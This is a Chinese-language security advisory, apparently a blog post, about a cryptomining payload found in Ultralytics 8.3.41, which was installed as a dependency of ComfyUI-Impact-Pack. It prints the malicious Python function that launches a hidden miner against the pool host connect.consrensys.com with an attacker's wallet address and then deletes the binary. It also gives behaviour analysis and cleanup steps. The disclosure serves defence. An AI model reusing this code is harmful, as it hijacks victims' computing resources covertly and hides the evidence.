潛在加密貨幣挖礦攻擊報告:ComfyUI 與 Ultralytics 的安全問題

概要描述

近期在使用 ComfyUI 搭配 ComfyUI-Impact-Pack 擴展時,發現疑似未經授權的加密貨幣挖礦行為。問題來源為 Ultralytics 套件中的一段惡意 Python 程式碼,該程式碼試圖使用系統資源進行未經許可的挖礦操作。

潛在加密貨幣挖礦攻擊報告:ComfyUI 與 Ultralytics 的安全問題

問題描述

這次事件涉及到安裝於以下路徑中的下載模組 (downloads.py): 你的使用者路徑/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils

惡意程式碼片段

以下是檢測到的惡意程式碼:

def safe_run(path):
    os.chmod(path, 0o770)
    command = [
        path,
        '-u',
        '4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw',
        '-o',
        'connect.consrensys.com:8080',
        '-k'
    ]
    process = subprocess.Popen(
        command,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        preexec_fn=os.setsid,
        close_fds=True
    )
    os.remove(path)

行為分析

  1. 權限變更:使用 os.chmod 令檔案可執行。
  2. 執行惡意命令:連接至礦池伺服器 connect.consrensys.com:8080
  3. 隱藏過程:壓制標準輸入、輸出和錯誤流,避免被察覺。
  4. 刪除檔案:執行後刪除檔案以掩蓋證據。

風險評估

潛在影響

  • 高系統資源占用:挖礦行為會顯著增加 CPU/GPU 的使用率。
  • 硬體損耗:長期高負載可能縮短硬體壽命。
  • 安全隱患:可能危及系統的敏感資料或整體安全性。

問題來源

該惡意行為與 Ultralytics 套件的可疑版本有關,該版本似乎作為 ComfyUI-Impact-Pack 的自動依賴項被安裝。

安裝路徑

  • 可疑套件:Ultralytics 版本 8.3.41
  • 位置你的使用者路徑/AppData/Roaming/Python/Python312/site-packages/ultralytics

啟動源

可能由 ComfyUI-Impact-Pack 中的 install.py 腳本觸發,該腳本會自動安裝依賴項。


網路行為分析

目標網域

  • 網域名稱connect.consrensys.com
  • 通訊埠:8080
  • 用途:懷疑為礦池伺服器的終端點,可能使用 Stratum 協議進行挖礦。

證據

  • 腳本中明確指定的礦池連接細節。
  • 使用私密金鑰(如 4BHRQHF...)表明有活躍的挖礦帳戶或操作。

推薦處置措施

  1. 卸載可疑套件
    pip uninstall ultralytics ultralytics-thop
    
  2. 移除 ComfyUI-Impact-Pack 刪除相關目錄:
    ./ComfyUI/custom_nodes/ComfyUI-Impact-Pack
    
  3. 掃描系統 使用防毒軟體和惡意程式檢測工具,確保沒有持續的威脅。

  4. 檢查網路連接 確認是否有到 connect.consrensys.com 的外部連接,並在防火牆中封鎖。

  5. 提高意識 將該報告提交給 ComfyUI 和 Ultralytics 的維護者,以防止進一步濫用。

附加證據

相關細節

  • 程式碼位置你的使用者路徑/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils/downloads.py
  • 行為模式:未經授權的檔案執行、礦池連接、及證據清理。
  • 觸發條件:ComfyUI-Impact-Pack 自動安裝依賴項。

資料來源

結論

此次事件表明開源專案中的依賴項審查不足可能導致使用者系統遭到惡意攻擊。建議開源社群實施更嚴格的審核機制以保護最終用戶。


Share on:
Previous: 語音合成新時代:Fish Speech 1.5 推出五種新語言,實現即時無縫對話!
Next: World Labs:AI生成3D互動世界的新革命
DMflow.chat

DMflow.chat

廣告

一站整合多平台聊天,體驗真人與 AI 自由切換的新境界!支援 Facebook、Instagram、Telegram、LINE 及網站,結合歷史記錄、推播通知、行銷活動及客服轉接,全面提升效率與互動。

OpenAI 即將發布開源推理o3-mini模型?
1 April 2025

OpenAI 即將發布開源推理o3-mini模型?

OpenAI 即將發布開源推理o3-mini模型? OpenAI 即將發布一款具備推理能力的開源模型,這是自 GPT-2 之後,公司再次推出的重要開源模型。這次發布吸引了全球開發者的關注...

ChatGPT 原生圖片生成功能開放免費用戶使用!AI 創作邁入新時代?
1 April 2025

ChatGPT 原生圖片生成功能開放免費用戶使用!AI 創作邁入新時代?

ChatGPT 原生圖片生成功能開放免費用戶使用!AI 創作邁入新時代? AI 圖像生成功能悄然擴展,免費用戶也能玩! OpenAI 最近釋出的 ChatGPT 圖片生成功能,在社群媒體上掀...

馬斯克的 AI 大棋局:xAI 與 X 正式合併,估值飆升 800 億美元,劍指 AI 霸權
30 March 2025

馬斯克的 AI 大棋局:xAI 與 X 正式合併,估值飆升 800 億美元,劍指 AI 霸權

馬斯克的 AI 大棋局:xAI 與 X 正式合併,估值飆升 800 億美元,劍指 AI 霸權? 科技巨頭馬斯克震撼宣布旗下 AI 新創 xAI 與社群平台 X 正式合併!全股票交易推升 ...

Vecto3D:將你的 SVG 轉換成 3D 模型的超簡單工具
29 March 2025

Vecto3D:將你的 SVG 轉換成 3D 模型的超簡單工具

Vecto3D:將你的 SVG 轉換成 3D 模型的超簡單工具 Vecto3D 是一款簡單易用的線上工具,專門用來將簡單的 SVG(主要是標誌)轉換為 3D 模型。你可以在 Vecto3...

開源 AI 音樂革命!YuE 模型正式發布,生成專業級人聲與伴奏
29 March 2025

開源 AI 音樂革命!YuE 模型正式發布,生成專業級人聲與伴奏

開源 AI 音樂革命!YuE 模型正式發布,生成專業級人聲與伴奏 YuE:AI 音樂創作新時代的來臨 由 香港科技大學 與 DeepSeek 共同研發的 開源音樂生成模型 YuE 正式發布,...

Manus 正式推出付費方案:Starter 套餐每月 $39 美元
29 March 2025

Manus 正式推出付費方案:Starter 套餐每月 $39 美元

Manus 正式推出付費方案:Starter 套餐每月 $39 美元 Manus 進軍付費市場,從免費試用轉向商業模式 在 AI 服務競爭日益激烈的市場中,Manus 正式宣布推出其首個付費...

GitHub重大突破:整合Google、Anthropic AI模型,Copilot coding助手功能大升級!
31 October 2024

GitHub重大突破:整合Google、Anthropic AI模型,Copilot coding助手功能大升級!

GitHub重大突破:整合Google、Anthropic AI模型,Copilot coding助手功能大升級! 震撼消息:GitHub在舊金山Universe大會上宣布與Google...

Meta 推出開源 Llama 3.3 70B,將強大的模型縮小為更小的尺寸
7 December 2024

Meta 推出開源 Llama 3.3 70B,將強大的模型縮小為更小的尺寸

Meta 推出開源 Llama 3.3 70B,將強大的模型縮小為更小的尺寸 簡介 Meta 最新推出的 Llama 3.3 70B 模型,不僅以創新技術挑戰傳統規模極限,還以不足 Llama...

ChatGPT重大更新:新增對話搜尋功能,訂閱用戶搶先體驗!
31 October 2024

ChatGPT重大更新:新增對話搜尋功能,訂閱用戶搶先體驗!

ChatGPT重大更新:新增對話搜尋功能,訂閱用戶搶先體驗! 重要突破:ChatGPT終於推出備受期待的歷史對話搜尋功能!本文詳細解析這項新功能如何改變使用者體驗,以及最新的介面更新與未...